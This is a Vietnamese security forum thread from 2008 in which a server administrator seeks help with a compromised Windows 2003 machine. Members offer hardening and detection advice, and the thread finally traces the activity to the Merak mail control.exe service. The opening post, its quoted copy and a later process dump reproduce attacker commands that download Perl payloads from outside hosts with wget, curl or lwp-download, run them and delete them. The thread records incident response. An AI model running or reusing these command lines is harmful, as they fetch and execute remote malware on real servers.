Cần giúp đỡ tìm rootkit và khắc phục

English | Vietnamese

Nội Quy

Diễn đàn

Portal

Danh sách thành viên

Thống kê

Tìm kiếm

Phòng đọc

Đăng ký

Đăng nhập [ | https ]

Diễn đàn chính

Thảo luận bảo mật

Cần giúp đỡ tìm rootkit và khắc phục

[Hỏi đáp] Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 16:38:39 (+0700) \| #1 \| 137430

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

Hi All,

1- Mình mới tham gia vào công việc bảo mật nên chưa có nhiều kiến thức và kinh nghiệm.
2- Thời gian tìm hiểu chưa nhiều, nhưng công việc thì cấp bách, mong các bạn có kiến thức và kinh nghiệm check dùm đoạn code bên dưới và cách khắc phục. Đoạn code này thực hiện liên tục và lặp lại (10 dòng lệnh này loop tuần tự và liên tục) mình không thể tìm được Rootkit này (bằng nhiều công cụ check rootkit khác nhau)
Qua công cụ check process mình bắt được đoạn code bên dưới hoạt động qua CMD.exe (windows 2003 Enterprise SP2)

------------------------------------------
cmd.exe /c cd /tmp/;lwp-download http://www.gg2003.de/phpBB2//language/kar/super.txt;chmod +x super.txt;perl super.txt;rm -rf super.txt;rm -rf super*
cmd.exe /c id
cmd.exe /c cd /tmp/;lwp-download http://mrcold.by.ru/scan.txt;chmod +x scan.txt;perl scan.txt;rm -rf scan.txt;rm -rf scan*
cmd.exe /c echo abcr57
cmd.exe /c cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*
cmd.exe /c id
cmd.exe /c echo abcr57
cmd.exe /c echo abcr57
cmd.exe /c cd /tmp;curl -O http://aschex1.as.funpic.de/new.txt;perl new.txt;rm -rf new*
cmd.exe /c echo abcr57
---------------------------------------------

Rất mong được hỗ trợ từ các bạn.

Cảm ơn.

[Hỏi đáp] Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 16:51:24 (+0700) \| #2 \| 137439

conmale
Administrator

Joined: 07/05/2004 23:43:15
Bài gởi: 6134
Đến từ: down under
Offline

putynov wrote:

Hi All,

1- Mình mới tham gia vào công việc bảo mật nên chưa có nhiều kiến thức và kinh nghiệm.
2- Thời gian tìm hiểu chưa nhiều, nhưng công việc thì cấp bách, mong các bạn có kiến thức và kinh nghiệm check dùm đoạn code bên dưới và cách khắc phục. Đoạn code này thực hiện liên tục và lặp lại (10 dòng lệnh này loop tuần tự và liên tục) mình không thể tìm được Rootkit này (bằng nhiều công cụ check rootkit khác nhau)
Qua công cụ check process mình bắt được đoạn code bên dưới hoạt động qua CMD.exe (windows 2003 Enterprise SP2)

------------------------------------------
cmd.exe /c cd /tmp/;lwp-download http://www.gg2003.de/phpBB2//language/kar/super.txt;chmod +x super.txt;perl super.txt;rm -rf super.txt;rm -rf super*
cmd.exe /c id
cmd.exe /c cd /tmp/;lwp-download http://mrcold.by.ru/scan.txt;chmod +x scan.txt;perl scan.txt;rm -rf scan.txt;rm -rf scan*
cmd.exe /c echo abcr57
cmd.exe /c cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*
cmd.exe /c id
cmd.exe /c echo abcr57
cmd.exe /c echo abcr57
cmd.exe /c cd /tmp;curl -O http://aschex1.as.funpic.de/new.txt;perl new.txt;rm -rf new*
cmd.exe /c echo abcr57
---------------------------------------------

Rất mong được hỗ trợ từ các bạn.

Cảm ơn.

Các cmd.exe kia chạy dưới chủ quyền gì?

Il est interdit d’interdire!

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 17:00:51 (+0700) \| #3 \| 137445

tmd
Member

Joined: 28/06/2006 03:39:48
Bài gởi: 2121
Offline

Bác tìm hiểu thêm mấy cái lệnh đàng sau dấu ; mà mod conmale bôi vàng, Và từ khi nào windows server 3003 của bác được cấu hình/hoặc được cho phép chạy mấy cái lệnh phía sau dấu ; đó.
PS: bao gồm cả wget,curl,lwp-download.

The wise man said just raise your hand. And reach out for the spell.Find the door to the promised land.
Just believe in yourself
Hear this voice from deep inside.It's the call of your heart.Close your eyes and your will find.
The way out of the dark

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 17:01:37 (+0700) \| #4 \| 137446

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

Conmale

Các cmd.exe kia chạy dưới chủ quyền gì?

Cảm ơn anh conmale đã trả lời nhanh.
Các cmd.exe này hoạt động dưới quyền SYSTEM (nguyên văn: User: NT AUTHORITY\SYSTEM)

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 17:12:38 (+0700) \| #5 \| 137449

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

tmd wrote:

Bác tìm hiểu thêm mấy cái lệnh đàng sau dấu ; mà mod conmale bôi vàng, Và từ khi nào windows server 3003 của bác được cấu hình/hoặc được cho phép chạy mấy cái lệnh phía sau dấu ; đó.

1- Các link trên có thể dễ dàng truy cập và mình có thể tạm hiểu đây là các đoạn mã độc được lấy về và thực hiện (trình bảo mật/ antivirus sẽ dễ dàng cảnh báo và loại bỏ)

2- Thời gian bị vấn đề này không được rõ lắm vì mình mới được tiếp nhận công việc. Do việc phải kiện toàn lại hệ thống và theo dõi theo các bước thông thường thì mình phát hiện.

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 17:17:44 (+0700) \| #6 \| 137450

tmd
Member

Joined: 28/06/2006 03:39:48
Bài gởi: 2121
Offline

Theo thông tin của bác cho thấy, server của bác thực thi cái scritpt có chứa 3 cái tool "phải được thêm vào windows" dưới dạng các tập tin thực thii .exe từ trước. Và server của bác được cấu hình để có thể chạy được perl script.Tui không biết perl.

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/06/2008 17:29:02 (+0700) \| #7 \| 137454

conmale
Administrator

Joined: 07/05/2004 23:43:15
Bài gởi: 6134
Đến từ: down under
Offline

putynov wrote:

Conmale

Các cmd.exe kia chạy dưới chủ quyền gì?

Cảm ơn anh conmale đã trả lời nhanh.
Các cmd.exe này hoạt động dưới quyền SYSTEM (nguyên văn: User: NT AUTHORITY\SYSTEM)

- Hầu hết các anti-virus có khả năng detect và remove rookit đều có thể "trị" mấy cái này dễ dàng.

- Disable scheduled task nếu có thể.

- Disable AT command nếu có thể.

- Set SYSTEM account trở thành non-interactive nếu cần.

- Một số anti-virus (cho server) có khả năng set để ngăn chặn không cho những binary cụ thể nào đó không được phép chạy (như perl, curl....).

- Trên Windows 2003, có thể set "Data Execution Prevention" (tự tìm hiểu nếu đóng vai trò admin của server).

Il est interdit d’interdire!

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	26/06/2008 11:29:18 (+0700) \| #8 \| 137988

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

conmale wrote:

putynov wrote:

Conmale

Các cmd.exe kia chạy dưới chủ quyền gì?

Cảm ơn anh conmale đã trả lời nhanh.
Các cmd.exe này hoạt động dưới quyền SYSTEM (nguyên văn: User: NT AUTHORITY\SYSTEM)

- Hầu hết các anti-virus có khả năng detect và remove rookit đều có thể "trị" mấy cái này dễ dàng.

- Disable scheduled task nếu có thể.

- Disable AT command nếu có thể.

- Set SYSTEM account trở thành non-interactive nếu cần.

- Một số anti-virus (cho server) có khả năng set để ngăn chặn không cho những binary cụ thể nào đó không được phép chạy (như perl, curl....).

- Trên Windows 2003, có thể set "Data Execution Prevention" (tự tìm hiểu nếu đóng vai trò admin của server).

-------------------------------------------------

Ngày qua mình đã đọc ý kiến của mọi người và anh conmale nhưng chưa kịp trả lời, hôm nay check và đã thực hiện kiểm tra trên server theo hướng dẫn, các thông tin về server:
- Server đã có sẵn Kaspersky 6 server
- Các chương trình Anti-Virus/ rootkit đã được sử dụng kiểm tra từ khi phát hiện hiện tượng trên nhưng không detect được ( các process cmd.exe kiểu này vẫn đang hoạt động)
- Server không đặt schedule.
- Disable AT command & Set SYSTEM account trở thành non-interactive: đang tiến hành check lại.
- Chưa thể thực hiện:

- Một số anti-virus (cho server) có khả năng set để ngăn chặn không cho những binary cụ thể nào đó không được phép chạy (như perl, curl....).

- "Data Execution Prevention": đã đặt sẵn chế độ "turn on DEP for all program..."

Re:

tmd
Post 24/06/2008 17:17:44 Tiêu đề: Re: Cần giúp đỡ tìm rootkit và khắc phục
Theo thông tin của bác cho thấy, server của bác thực thi cái scritpt có chứa 3 cái tool "phải được thêm vào windows" dưới dạng các tập tin thực thii .exe từ trước. Và server của bác được cấu hình để có thể chạy được perl script.Tui không biết perl.

Cảm ơn bạn tmd đã hướng dẫn, đúng là server mình chạy được perl (hỗ trợ cho các chương trình khác), mình cũng không rành perl nên chưa check được.
-------------------------------------------------------

Một điều mình mới phát hiện được là server không restart hơn 1 ngày thì mới phát hiện hiện được hiện tượng trên qua process tool. Ngược lại, server mới boot lại hoặc reboot tự động hàng ngày sẽ không tìm thấy các cmd.exe này.
Điều này cho thấy nó hoạt động sau một khoảng thời gian nào đó khá lâu sau khi server uptime.

Mong được góp ý thêm.

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	23/07/2008 10:56:01 (+0700) \| #9 \| 142992

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

Cuối cùng cũng tìm được "kẻ dấu mặt": MERAK MAIL
Service control.exe của Merak mail đã điều khiển các process này:
Ví dụ: trong process cmd.exe có PID: 7640 và Parent PID: 1708.
Từ port process có thể thấy PID: 1708 là của control.exe (Merak control)
(Thông số bên dưới)

Ngoài ra, traffice của server nhiều lúc tăng cao đột ngột và treo sau 1 thời gian dẫu cho reset IIS, ban đầu mình nghĩ có thể 1 website nào đó bị DoS, nhưng khi xác định được lỗi do Merakmail, khi stop service Merak control.exe thì server hoạt động bình thường.

Hiện tại mình mới tìm ra nguyên nhân, còn cách khắc phục thì chưa có. Mong các bạn HVAforum nếu có cách xử lý hoặc đã từng biết bugs này tư vấn thêm.

Process detail:
-----------------------------------------------------
Description: Windows Command Processor
Company: Microsoft Corporation
Name: cmd.exe
Version: 5.02.3790.3959
Path: C:\WINDOWS\system32\cmd.exe
Command Line: cmd.exe /c cd /tmp;curl -O http://www.devilhouse.org/bot.txt;perl bot.txt;rm -rf bot.txt*;
PID: 7640
Parent PID: 1708
Session ID: 0
User: NT AUTHORITY\SYSTEM
Auth ID: 00000000:000003e7
Architecture: 32-bit
Virtualized: n/a
Integrity: n/a
Started: 7/22/2008 6:15:26 PM
Ended: (Running)
Modules:

Description: Windows Command Processor
Company: Microsoft Corporation
Name: cmd.exe
Version: 5.02.3790.3959
Path: C:\WINDOWS\system32\cmd.exe
Command Line: cmd.exe /c uptime
PID: 1668
Parent PID: 1708
Session ID: 0
User: NT AUTHORITY\SYSTEM
Auth ID: 00000000:000003e7
Architecture: 32-bit
Virtualized: n/a
Integrity: n/a
Started: 7/22/2008 8:39:53 PM
Ended: (Running)
Modules:

Description: Windows Command Processor
Company: Microsoft Corporation
Name: cmd.exe
Version: 5.02.3790.3959
Path: C:\WINDOWS\system32\cmd.exe
Command Line: cmd.exe /c echo abcr57
PID: 6120
Parent PID: 1708
Session ID: 0
User: NT AUTHORITY\SYSTEM
Auth ID: 00000000:000003e7
Architecture: 32-bit
Virtualized: n/a
Integrity: n/a
Started: 7/22/2008 9:09:53 PM
Ended: (Running)
Modules:

---------------------------------------------------------
Port process:
---------------
Active Connections

Proto Local Address Foreign Address State PID Offload State

TCP server:webmail host-41.235.5.40.tedata.net:2326 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail host-41.235.5.40.tedata.net:2356 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail mail.myjeeprocks.com:58347 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail 92.f0.354a.static.theplanet.com:56966 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail 92.f0.354a.static.theplanet.com:58948 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail 92.f0.354a.static.theplanet.com:56662 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail t33.greatnet.de:3680 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail 88.214.192.29:51987 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail 86.subnet125-162-120.speedy.telkom.net.id:2507 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail 86.subnet125-162-120.speedy.telkom.net.id:2417 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail ppp-69-52.33-151.iol.it:2878 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail svs-5.ru:52916 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail ns1.host-squad.com:35066 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail ip-208-109-234-140.ip.secureserver.net:40528 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

TCP server:webmail www.ilonhosting.com:55855 CLOSE_WAIT 1708 InHost
MerakControl
[control.exe]

--------------------------------------------
Và mở hàng ngàn port UDP ở service DNS:

UDP server:58859 *:* 1356
DNS
[dns.exe]

UDP server:65026 *:* 1356
DNS
[dns.exe]

UDP server:57573 *:* 1356
DNS
[dns.exe]

UDP server:51919 *:* 1356
DNS
[dns.exe]

UDP server:54232 *:* 1356
DNS
[dns.exe]

UDP server:58601 *:* 1356
DNS
[dns.exe]

UDP server:64769 *:* 1356
DNS
[dns.exe]

UDP server:61684 *:* 1356
DNS
[dns.exe]

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/07/2008 13:13:15 (+0700) \| #10 \| 143173

LeVuHoang
Moderator

Joined: 08/03/2003 16:54:07
Bài gởi: 1014
Offline

Theo như bạn mô tả thì có thể process control.exe bị điều khiển để thực thi lệnh cmd.
Bạn thử:
1. Tắt process này xem còn bị hay không
2. Nếu hết bị, bạn thử xem các luồng dữ liệu vào process này như thế nào. Theo Hoàng đoán có thể control.exe có lỗi buffer overflow để execute 1 application bất kỳ. Cấm các port không cần thiết vào control.exe (như trong mô tả thì đây là của Mail Server???). Đây cũng chính là ý "Data Execution Prevention" mà bác conmale đã đề cập ở trên.
3. Sử dụng thử 1 firewall nào đó để cản lọc gói tin.
4. Update Windows và Mail Server của bạn lên latest version.

Mọi câu hỏi vui lòng post lên diễn đàn. Các PM hỏi/đáp mặc nhiên sẽ bị loại bỏ. Thanks

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/07/2008 15:46:58 (+0700) \| #11 \| 143198

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

LeVuHoang wrote:

Theo như bạn mô tả thì có thể process control.exe bị điều khiển để thực thi lệnh cmd.
Bạn thử:
1. Tắt process này xem còn bị hay không
2. Nếu hết bị, bạn thử xem các luồng dữ liệu vào process này như thế nào. Theo Hoàng đoán có thể control.exe có lỗi buffer overflow để execute 1 application bất kỳ. Cấm các port không cần thiết vào control.exe (như trong mô tả thì đây là của Mail Server???). Đây cũng chính là ý "Data Execution Prevention" mà bác conmale đã đề cập ở trên.
3. Sử dụng thử 1 firewall nào đó để cản lọc gói tin.
4. Update Windows và Mail Server của bạn lên latest version.

Cảm ơn bạn LeVuHoang
Server của mình vẫn hoạt động, lâu lâu traffic tăng mạnh nhưng không phát hiện được các CMD.exe kia (chỉ phát hiện được khi server nhiều ngày không restart).

Mình đã thực hiện khi traffic tự động tăng cao (khoảng 10 lần /ngày):

1- Kill process control.exe thì traffic bình thường
2- DEP đã sử dụng nhưng chưa thấy hiệu quả, mình chưa biết cách nào khác để config DEP tốt hơn.
3- Firewall: Mình chỉ sử dụng Firewall Windows filter port thôi, bạn có thể tư vấn cho mình biết firewall nào kiểm soát gói tin tốt không (sử dụng trên Windows 2003)
4- Win của mình đã update tất cả các cập nhật mới nhất của MS, về Mail server thì không lên version mới nhất được vì vấn đề licence.

Một số bug về Mail server (trong đó có bug về control.exe này) đã tìm thấy tại http://seclists.org/bugtraq/2005/May/0035.html, nhưng cách giải quyết là $ hoặc mua version mới (cũng phải bỏ $ smilie

)

Một khả năng mình nghi ngờ là server đã bị cài làm botnet, nhưng không cách nào phát hiện ra!

Ở VN mình cũng thấy nhiều nơi sử dụng Mail Merak, không rõ có ai gặp trường hợp này và có cách fix không?
Hy vọng được chia sẻ và tư vấn thêm!.

Cảm ơn tất cả member HVAforum đã quan tâm và hỗ trợ!

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/07/2008 22:38:52 (+0700) \| #12 \| 143259

LeVuHoang
Moderator

Joined: 08/03/2003 16:54:07
Bài gởi: 1014
Offline

Vậy bạn có thể làm cách nào đó để chặn execute cái cmd.exe. Đơn giản là... rename file đó xem smilie

PS: Ngoài ra, trên cái link bạn đưa cũng có nêu nè:

Disable Icewarp Web Mail service (Control.exe).

.

Đó chỉ là những giải pháp tạm thời cho tiết kiệm thôi. Chứ cách tốt nhất vẫn là upgrade lên latest version, hạ privileges xuống và cấm không cho control.exe thực thi bất cứ file gì.

Mọi câu hỏi vui lòng post lên diễn đàn. Các PM hỏi/đáp mặc nhiên sẽ bị loại bỏ. Thanks

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/07/2008 23:26:58 (+0700) \| #13 \| 143271

TQN
Elite Member

Joined: 29/06/2006 22:28:01
Bài gởi: 325
Đến từ: Biết làm chi ?
Offline

Thấy nó down về 1 đống file perl thiệt bự, nhìn đã muốn mệt rồi nói chi đọc.
Cái mail server gì đó của cậu (+ control.exe) version mấy ? Theo securityfocus thì tui không thấy bug nào cho phép run cmd.exe từ control.exe cả, cho phép tạo file thì có.
Nếu không thể turn off control.exe thì tìm tool nào đó monitor và cấm create process từ control.exe, như IceSword, GMER chẵng hạn.
Đôi khi không thể tin tưỡng 100% vào các AV được. Dùng Process Explorer, AutoRuns, IceSword, GMER để tìm các autorun lạ, các hidden files, process. Nếu sạch 100% thì mới kết luận control.exe bị bug cho phép remote execute.
Cậu nào rành perl đọc và mô tả hoạt động của mấy file perl .txt đó đi, hình như là code bot net thì phải.

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	24/07/2008 23:36:23 (+0700) \| #14 \| 143274

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

Cảm ơn ý kiến các bạn.

Việc disable control.exe của Merak mail là không thể vì như thế dịch vụ mail sẽ không hoạt động.

Hiện tại mình tạm thời dùng auto script check khi traffic lên cao sẽ tự động kill process control.exe và khởi động lại sau 1 khoảng thời gian. Việc này chỉ mang tính đối phó, mình sẽ nghiên cứu áp dụng các soft IceSword, GMER do TQN giới thiệu.

Trân trọng.

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	25/07/2008 15:56:43 (+0700) \| #15 \| 143384

LeVuHoang
Moderator

Joined: 08/03/2003 16:54:07
Bài gởi: 1014
Offline

Sao putynov không thử rename cmd.exe -> cmd1.exe nhỉ smilie

Mọi câu hỏi vui lòng post lên diễn đàn. Các PM hỏi/đáp mặc nhiên sẽ bị loại bỏ. Thanks

[Hỏi đáp] Re: Cần giúp đỡ tìm rootkit và khắc phục	25/07/2008 18:44:47 (+0700) \| #16 \| 143408

putynov
Member

Joined: 28/05/2008 17:33:39
Bài gởi: 15
Offline

LeVuHoang wrote:

Sao putynov không thử rename cmd.exe -> cmd1.exe nhỉ

MÌnh cũng định đổi tên hoặc change permission cmd.exe, nhưng sợ một số ứng dụng/service của hệ thống có sử dụng cmd.exe nên không dám thực hiện.

Hiện tại đã change permission cho service control.exe, không cho active với quyền system nữa. Cũng thấy có tác dụng chút ít nhưng cần thời gian theo dõi và kiểm tra hoạt động của hệ thống mail này, hy vọng sẽ ổn hơn. smilie

Chuyển đến:

Các thành viên đang hiện diện ở đây
1 Khách